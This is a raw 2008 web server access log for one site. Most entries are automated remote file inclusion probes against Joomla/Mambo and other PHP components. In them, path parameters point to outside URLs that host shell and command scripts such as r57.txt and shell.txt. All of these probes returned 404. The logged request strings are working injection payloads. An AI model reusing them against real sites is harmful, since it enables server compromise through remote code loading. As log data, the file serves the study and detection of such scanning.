74.6.25.34 - - [21/Feb/2008:08:52:13 -0800] "GET /tmp/?S=A HTTP/1.0" 200 812 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.230.11.181 - - [21/Feb/2008:08:52:24 -0800] "GET /index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.79.75.195 - - [21/Feb/2008:08:52:46 -0800] "GET /index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.197.170 - - [21/Feb/2008:08:53:13 -0800] "GET /logs/access_080123.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fgo.at/tmp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.197.170 - - [21/Feb/2008:08:53:13 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fgo.at/tmp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.50.208.4 - - [21/Feb/2008:08:53:20 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nocsom.org/images/IDsafeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.50.208.3 - - [21/Feb/2008:08:53:20 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nocsom.org/images/IDsafeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.50.208.9 - - [21/Feb/2008:08:53:45 -0800] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nocsom.org/images/IDsafeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.50.208.7 - - [21/Feb/2008:08:53:45 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nocsom.org/images/IDsafeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.50.208.4 - - [21/Feb/2008:08:53:45 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nocsom.org/images/IDsafeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.146.33.210 - - [21/Feb/2008:08:53:52 -0800] "GET /logs/index2.php?option=com_slideshow§ion=&mosConfig_absolute_path=http://askastro.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
82.146.33.210 - - [21/Feb/2008:08:53:53 -0800] "GET /index2.php?option=com_slideshow§ion=&mosConfig_absolute_path=http://askastro.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
194.79.75.195 - - [21/Feb/2008:08:53:57 -0800] "GET /logs/access_080120.log/index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.79.75.195 - - [21/Feb/2008:08:53:57 -0800] "GET /logs/index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.41.233.108 - - [21/Feb/2008:08:53:59 -0800] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
78.41.233.108 - - [21/Feb/2008:08:54:01 -0800] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
194.79.75.195 - - [21/Feb/2008:08:54:03 -0800] "GET /logs/access_080101.log/index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.50.14.189 - - [21/Feb/2008:08:54:09 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fgo.at/tmp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.11.181 - - [21/Feb/2008:08:54:10 -0800] "GET /logs/access_080120.log/index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.11.181 - - [21/Feb/2008:08:54:17 -0800] "GET /logs/index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.11.181 - - [21/Feb/2008:08:54:35 -0800] "GET /logs/access_080101.log/index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.143.194.136 - - [21/Feb/2008:08:54:37 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
194.143.194.136 - - [21/Feb/2008:08:54:42 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
222.96.156.153 - - [21/Feb/2008:08:54:42 -0800] "GET /logs/access_080211.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
203.86.232.194 - - [21/Feb/2008:08:54:57 -0800] "GET /logs/access_071225.log/index.php?body=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.50.208.3 - - [21/Feb/2008:08:55:23 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nocsom.org/images/IDsafeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.25.143 - - [21/Feb/2008:08:56:03 -0800] "GET /logs/access_080110.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.123.27.136 - - [21/Feb/2008:08:56:46 -0800] "GET /logs/access_080131.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.50.208.5 - - [21/Feb/2008:08:57:00 -0800] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nocsom.org/images/IDsafeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.50.208.9 - - [21/Feb/2008:08:57:00 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nocsom.org/images/IDsafeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.50.208.7 - - [21/Feb/2008:08:57:01 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nocsom.org/images/IDsafeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.88.23.149 - - [21/Feb/2008:08:58:12 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.geocities.com/jhonw2005/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
85.88.23.149 - - [21/Feb/2008:08:58:12 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.geocities.com/jhonw2005/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
62.75.177.136 - - [21/Feb/2008:08:58:19 -0800] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.geocities.com/kang_crew/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.177.136 - - [21/Feb/2008:08:58:19 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.geocities.com/kang_crew/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.177.136 - - [21/Feb/2008:08:58:20 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.geocities.com/kang_crew/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
208.50.208.3 - - [21/Feb/2008:08:58:34 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nocsom.org/images/IDsafeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.146.33.210 - - [21/Feb/2008:08:59:43 -0800] "GET /logs/index.php?option=com_webring&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.146.33.210 - - [21/Feb/2008:08:59:43 -0800] "GET /index.php?option=com_webring&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
124.217.247.200 - - [21/Feb/2008:09:00:07 -0800] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.115.110.146 - - [21/Feb/2008:09:00:28 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
211.115.110.146 - - [21/Feb/2008:09:00:28 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
200.29.188.25 - - [21/Feb/2008:09:00:55 -0800] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://smkk.by.ru/cmdhave.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
200.29.188.25 - - [21/Feb/2008:09:00:55 -0800] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://smkk.by.ru/cmdhave.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
69.22.162.60 - - [21/Feb/2008:09:01:27 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.toms-carwash.nl/mailing/oneadmin/upload/read.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
69.22.162.60 - - [21/Feb/2008:09:01:28 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.toms-carwash.nl/mailing/oneadmin/upload/read.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
211.233.19.105 - - [21/Feb/2008:09:01:32 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
211.233.19.105 - - [21/Feb/2008:09:01:32 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
66.230.197.170 - - [21/Feb/2008:09:01:51 -0800] "GET /logs/access_080126.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fgo.at/tmp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.203.223.115 - - [21/Feb/2008:09:01:57 -0800] "GET /logs/access_080126.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.115 - - [21/Feb/2008:09:01:57 -0800] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.64.18 - - [21/Feb/2008:09:02:20 -0800] "GET /index.php?option=com_webring&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
202.60.64.18 - - [21/Feb/2008:09:02:20 -0800] "GET /logs/index.php?option=com_webring&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
82.146.40.49 - - [21/Feb/2008:09:02:35 -0800] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
82.146.40.49 - - [21/Feb/2008:09:02:36 -0800] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
210.56.151.3 - - [21/Feb/2008:09:02:50 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.56.151.3 - - [21/Feb/2008:09:02:50 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.96.156.153 - - [21/Feb/2008:09:02:54 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
222.96.156.153 - - [21/Feb/2008:09:02:54 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
75.125.10.2 - - [21/Feb/2008:09:02:58 -0800] "GET /logs/access_080121.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.10.2 - - [21/Feb/2008:09:02:59 -0800] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.10.2 - - [21/Feb/2008:09:03:00 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.22.60.11 - - [21/Feb/2008:09:03:18 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.demens.be/images/upload/plekih/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.88.23.149 - - [21/Feb/2008:09:04:00 -0800] "GET /index.php?option=com_joomla_flash_uploader&Itemid=&mosConfig_absolute_path=http://www.geocities.com/jhonw2005/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
85.88.23.149 - - [21/Feb/2008:09:04:08 -0800] "GET /logs/index.php?option=com_joomla_flash_uploader&Itemid=&mosConfig_absolute_path=http://www.geocities.com/jhonw2005/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
63.139.243.11 - - [21/Feb/2008:09:04:32 -0800] "GET /logs/access_071222.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.139.243.11 - - [21/Feb/2008:09:04:33 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.139.243.11 - - [21/Feb/2008:09:04:34 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.56.151.3 - - [21/Feb/2008:09:04:50 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.205.57.211 - - [21/Feb/2008:09:05:08 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://rcces.ru/cache/riCo?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
74.205.57.211 - - [21/Feb/2008:09:05:08 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://rcces.ru/cache/riCo?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
89.149.227.37 - - [21/Feb/2008:09:06:01 -0800] "GET /logs/access.log/index.php?pagina=http://wypierdalaj23.w8w.pl/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.149.227.37 - - [21/Feb/2008:09:06:02 -0800] "GET /index.php?pagina=http://wypierdalaj23.w8w.pl/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.149.227.37 - - [21/Feb/2008:09:06:02 -0800] "GET /logs/index.php?pagina=http://wypierdalaj23.w8w.pl/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.29.188.25 - - [21/Feb/2008:09:06:31 -0800] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://smkk.by.ru/cmdhave.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
200.29.188.25 - - [21/Feb/2008:09:06:31 -0800] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://smkk.by.ru/cmdhave.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
211.233.7.68 - - [21/Feb/2008:09:06:54 -0800] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
211.233.7.68 - - [21/Feb/2008:09:06:54 -0800] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
62.50.14.189 - - [21/Feb/2008:09:07:37 -0800] "GET /logs/access_080123.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fgo.at/tmp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.50.14.189 - - [21/Feb/2008:09:07:38 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fgo.at/tmp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.129.137 - - [21/Feb/2008:09:08:19 -0800] "GET //modules/vwar/upload/errors.php?error=http://www.familie-neinert.de/board//language/lang_german/.../robots.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
85.25.129.137 - - [21/Feb/2008:09:08:19 -0800] "GET /logs//modules/vwar/upload/errors.php?error=http://www.familie-neinert.de/board//language/lang_german/.../robots.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
69.22.162.60 - - [21/Feb/2008:09:08:39 -0800] "GET /index.php?option=com_joomla_flash_uploader&Itemid=&mosConfig_absolute_path=http://www.toms-carwash.nl/mailing/oneadmin/upload/read.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
69.22.162.60 - - [21/Feb/2008:09:08:40 -0800] "GET /logs/index.php?option=com_joomla_flash_uploader&Itemid=&mosConfig_absolute_path=http://www.toms-carwash.nl/mailing/oneadmin/upload/read.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
67.195.58.169 - - [21/Feb/2008:09:10:27 -0800] "GET /logs/access_080201.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.88.23.149 - - [21/Feb/2008:09:10:42 -0800] "GET /index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.geocities.com/jhonw2005/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
85.88.23.149 - - [21/Feb/2008:09:10:42 -0800] "GET /logs/index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.geocities.com/jhonw2005/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
69.22.162.60 - - [21/Feb/2008:09:11:02 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.toms-carwash.nl/mailing/oneadmin/upload/read.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
69.22.162.60 - - [21/Feb/2008:09:11:03 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.toms-carwash.nl/mailing/oneadmin/upload/read.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
82.146.33.210 - - [21/Feb/2008:09:13:17 -0800] "GET /logs/index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
82.146.33.210 - - [21/Feb/2008:09:13:18 -0800] "GET /index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
148.237.3.82 - - [21/Feb/2008:09:13:31 -0800] "GET /index.php?http://oldbonescrew.de/modules/vwar/convert/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
148.237.3.82 - - [21/Feb/2008:09:13:31 -0800] "GET /logs/index.php?http://oldbonescrew.de/modules/vwar/convert/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.17.200.74 - - [21/Feb/2008:09:13:39 -0800] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.200.74 - - [21/Feb/2008:09:13:44 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.200.74 - - [21/Feb/2008:09:13:50 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.50.208.5 - - [21/Feb/2008:09:14:06 -0800] "GET /logs/access_080121.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.50.208.8 - - [21/Feb/2008:09:14:06 -0800] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.50.208.9 - - [21/Feb/2008:09:14:06 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.148.27 - - [21/Feb/2008:09:14:09 -0800] "GET /index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.49 - - [21/Feb/2008:09:14:12 -0800] "GET /retreat1/webcam/ HTTP/1.0" 200 196254 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.22.61.3 - - [21/Feb/2008:09:14:57 -0800] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.22.61.3 - - [21/Feb/2008:09:14:57 -0800] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.22.61.3 - - [21/Feb/2008:09:14:57 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.22.61.3 - - [21/Feb/2008:09:14:57 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.22.61.3 - - [21/Feb/2008:09:14:58 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
